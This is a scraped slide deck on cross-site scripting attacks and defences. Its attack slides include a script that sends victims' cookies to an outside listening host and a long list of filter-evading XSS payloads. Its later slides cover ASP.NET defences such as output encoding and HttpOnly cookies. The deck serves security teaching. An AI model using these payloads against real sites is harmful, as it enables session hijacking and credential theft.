Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

XSS - Attacks & Defense

2,584 views

Published on

This preso covers XSS in detail.

Published in: Technology
  • Be the first to comment

XSS - Attacks & Defense

  1. 1. XSS – Attacks & Defense
  2. 2. Cross Site Scripting • A user’s credentials may be recovered by another user. • Inject client-side code as part of data content stored on the server side. – e.g. Javascript • When a user views the stored content, the client-side code executes on browser. • Transmit the current credentials to the attacker.
  3. 3. XSS types • XSS is of three types – Persistent – Non Persistent – DOM based
  4. 4. Non-persistent XSS • Application echo backs response • It can be over GET or POST • Very common with application developers • Features like search is common place for it • Error handling routines are vulnerable to it as well • Attacker can inject stream in it • Various tags can be injected
  5. 5. Non-persistent XSS • Attack vectors are common • Exploitation is possible • Session hijacking with cookie retrieval is most popular ways • Links coming in the mail or social sites can lead to XSS • It is also known as type 1 OR reflected XSS
  6. 6. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 NAME VALUE username saumil NAME VALUE username arthur inject <IFRAME> javascript 8008
  7. 7. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008
  8. 8. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652>
  9. 9. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652> GET /SESSID=84658734652 HTTP/1.0 (happens automatically)
  10. 10. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652> SESSID=84658734652
  11. 11. What to inject - IFRAME example • Inject a 1x1 floating frame: • When the frame is loaded, it will cause the browser to make an automatic request. • Requesting URL http://192.168.7.41:8008/<cookie_value> <script>document.write(“<iframe src=”http://192.168.7.41:8008/”+document.cookie+”” width=1 height=1 frameborder=0></iframe>”);</script>
  12. 12. Persistent XSS • In this XSS vector, attacker gets write access on the application • If application page can be loaded with malicious code • This code accessed by victim • Code gets executed on the client machine • XSS – credential stealing • Examples – bulletin board, blogs etc.
  13. 13. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 NAME VALUE username saumil NAME VALUE username arthur inject <IFRAME> javascript 8008
  14. 14. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008
  15. 15. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652>
  16. 16. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652> GET /SESSID=84658734652 HTTP/1.0 (happens automatically)
  17. 17. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app Web app Web Client SESSION KEYS 78974369523 12323747677 84658734652 NAME VALUE username saumil NAME VALUE username arthur NAME VALUE username nitesh SESSID=84658734652 8008 <iframe src= http://attacker/SESSID=84658734652> SESSID=84658734652
  18. 18. XSS injection vectors • Applications are filtering certain traffic • Popular tags are filtered out as well • Character filtering is in place • There are various ways to inject vectors.
  19. 19. XSS vector • ';alert(String.fromCharCode(88,83,83))//';aler t(String.fromCharCode(88,83,83))//";alert(Stri ng.fromCharCode(88,83,83))//";alert(String.fr omCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromChar Code(88,83,83))</SCRIPT> • '';!--"<XSS>=&{()}
  20. 20. XSS vector • <SCRIPT SRC=http://url/xss.js></SCRIPT> • <IMG SRC="javascript:alert('XSS');"> • <IMG SRC=javascript:alert('XSS')> • <IMG SRC=JaVaScRiPt:alert('XSS')> • <IMG SRC=javascript:alert(&quot;XSS&quot;)> • <IMG SRC=`javascript:alert("XSS")`> • Image tag malformed - <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  21. 21. XSS vector • <IMG SRC=javascript:alert(String.fromCharCode(88, 83,83))> • Unicode encoding - <IMG SRC=javasc ript:a&#1 08;ert('X&# 83;S')>
  22. 22. XSS vector • UTF-8 - <IMG SRC=&#0000106&#0000097&#0000118&#000 0097&#0000115&#0000099&#0000114&#000 0105&#0000112&#0000116&#0000058&#000 0097&#0000108&#0000101&#0000114&#000 0116&#0000040&#0000039&#0000088&#000 0083&#0000083&#0000039&#0000041>
  23. 23. XSS vector • Hex - <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63& #x72&#x69&#x70&#x74&#x3A&#x61&#x6C& #x65&#x72&#x74&#x28&#x27&#x58&#x53&# x53&#x27&#x29> • XSS breakup - <IMG SRC="jav ascript:alert('XSS');"> • <IMG SRC="jav ascript:alert('XSS');">
  24. 24. XSS vector • <IMG SRC="jav ascript:alert('XSS');"> (line feed) • <IMG SRC="jav ascript:alert('XSS');"> (carriage return) • Multi-line injection
  25. 25. XSS vector • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <BODY BACKGROUND="javascript:alert('XSS')"> • <BODY ONLOAD=alert('XSS')> • BR, Layer etc. • <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> • HTTP-Equiv
  26. 26. XSS vector • Iframe, Frameset & Table(background) • Base tag • Object tag XSS • Embed – with flash • XML namespace injection • XML ID, SRC etc.
  27. 27. DOM based XSS • Ajax based XSS is relatively new way of attacking the client • Code written on browser end can be vulnerable to this attacks • Various different structures can have their own confusion • Information processing from un-trusted sources can lead to XSS
  28. 28. DOM based XSS • Stream can be injected into the Ajax routine • If function is vulnerable to XSS then it executes the script • Script can be coming in various forms • Web 2.0 applications are consuming various scripts and that makes it vulnerable to this set of attacks
  29. 29. DOM based XSS <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf(“user=")+5; document.write(document.URL.substring(pos,document.URL. length)); </SCRIPT> <BR> Welcome to our system … </HTML>
  30. 30. DOM based XSS http://www.target.com/profile.html?user=Jack Exploit - http://www.target.com/profile.html?user= <script>alert(document.cookie)</script>
  31. 31. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 Third party source Stream eval() XSS
  32. 32. DOM based XSS if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close();
  33. 33. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 XML Stream eval() XSS
  34. 34. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 JSON Stream eval() XSS
  35. 35. Anatomy of an XSS attack Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 JS-Object / JS-Array / JS-Script Stream eval() XSS
  36. 36. DOM based XSS document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… document.attachEvent(…) document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…)
  37. 37. DOM based XSS document.open(…) window.open(…) window.location.href=… (and assigning to location’s href, host and hostname) eval(…) window.execScript(…) window.setInterval(…) window.setTimeout(…)
  38. 38. Exploit and testing framework • There are testing framework for XSS which can be used during the testing • CAL9000 – OWASP project • BeeF – Browser exploit framework • XSSproxy • Few other out there
  39. 39. Securing XSS
  40. 40. Prevent XSS • Design Strategy • Validate Input. • Encode output variable data. • Sanitizing Free Format Input. • Set the correct character encoding. • Use the ASP.NET validateRequest option. • Use the HttpOnly cookie option. • Use the <frame> security attribute. • Use the innerText property.
  41. 41. Prevent XSS • Encode output using HtmlEncode / URLEncode methods. • Do this even for user input, a database, or a local file. The HtmlEncode method replaces characters that have special meaning in HTML to HTML variables that represent those characters. For example, < is replaced with &lt and " is replaced with &quot. Encoded data does not cause the browser to execute code. Instead, the data is rendered as harmless HTML. Response.Write(HttpUtility.HtmlEncode(Request.Form["name"]));
  42. 42. Prevent XSS • Data-Bound Controls: DataGrid, DataList, RadioButtonList and CheckBoxList do not perform encoding, • Turn all columns into templates and manually use HtmlEncode()/UrlEncode() on each call to DataBinder.Eval • Override one of its DataBinding methods, such as OnDatabinding or OnItemDataBound and perform encoding on its items.
  43. 43. Prevent XSS • Allow Safe HTML like comments, blog fields, • Process it with HtmlEncode • Remove encoding on selected safe HTML tags StringBuilder sb = new StringBuilder( HttpUtility.HtmlEncode(userInput) ) ; sb.Replace("&lt;b&gt;", "<b>"); sb.Replace("&lt;/b&gt;", "</b>"); sb.Replace("&lt;i&gt;", "<i>"); sb.Replace("&lt;/i&gt;", "</i>"); Response.Write(sb.ToString());
  44. 44. Prevent XSS • Set the Correct Character Encoding, • Application / Page level <meta http-equiv="Content Type" content="text/html; charset=ISO-8859-1" /> OR <% @ Page ResponseEncoding="ISO-8859-1" %> To set the character encoding in Web.config, use the following configuration: <configuration> <system.web> <globalization requestEncoding="ISO-8859-1" responseEncoding="ISO-8859-1"/> </system.web> </configuration>
  45. 45. Prevent XSS • Validating Unicode Characters, using System.Text.RegularExpressions; private void Page_Load(object sender, System.EventArgs e) { // Name must contain between 1 and 40 alphanumeric characters // together with (optionally) special characters '`' for names such // as D'Angelo if (!Regex.IsMatch(Request.Form["name"], @"^[p{L}p{Zs}p{Lu}p{Ll}']{1,40}$")) throw new ArgumentException("Invalid name parameter"); } •{<name>} specifies a named Unicode character class. •p{<name>} matches any character in the named character class specified by {<name>}. •{L} performs a left-to-right match. •{Lu} performs a match of uppercase. •{Ll} performs a match of lowercase. •{Zs} matches separator and space. •{1,40} means no less that 1 and no more than 40 characters. •{Mn} matches mark and non-spacing characters. •{Zs} matches separator and space. •* specifies zero or more matches. •$ means stop looking at this position.
  46. 46. Prevent XSS • Use the ASP.NET validateRequest Option, • By default, it is TRUE • Instruct ASP.NET to check for malicious inputs like <script>, etc. <% @ Page validateRequest="True" %>;
  47. 47. Prevent XSS • Use the HttpOnly Cookie Option. • prevents client-side script from accessing the cookie from the document.cookie property protected void Application_EndRequest(Object sender, EventArgs e) { string authCookie = FormsAuthentication.FormsCookieName; foreach (string sCookie in Response.Cookies) { if (sCookie.Equals(authCookie)) { // Force HttpOnly to be added to the cookie header Response.Cookies[sCookie].Path += ";HttpOnly"; } } }
  48. 48. Prevent XSS • Use the <frame> Security Attribute, • Use the innerText property instead of innerHTML property. <frame security="restricted" src="http://www.somesite.com/somepage.htm"></frame>
  49. 49. Prevent XSS • Use AntiXSS library, //bad code String Name = Request.QueryString["Name"]; //code with antixss library String Name = AntiXss.HtmlEncode(Request.QueryString["Name"]); namespace Microsoft.Application.Security { public class AntiXss { public static string HtmlEncode(string s); public static string HtmlAttributeEncode(string s); public static string JavaScriptEncode(string s); public static string UrlEncode(string s); public static string VisualBasicScriptEncode(string s); public static string XmlEncode(string s); public static string XmlAttributeEncode(string s); } }
  50. 50. Conclusion

×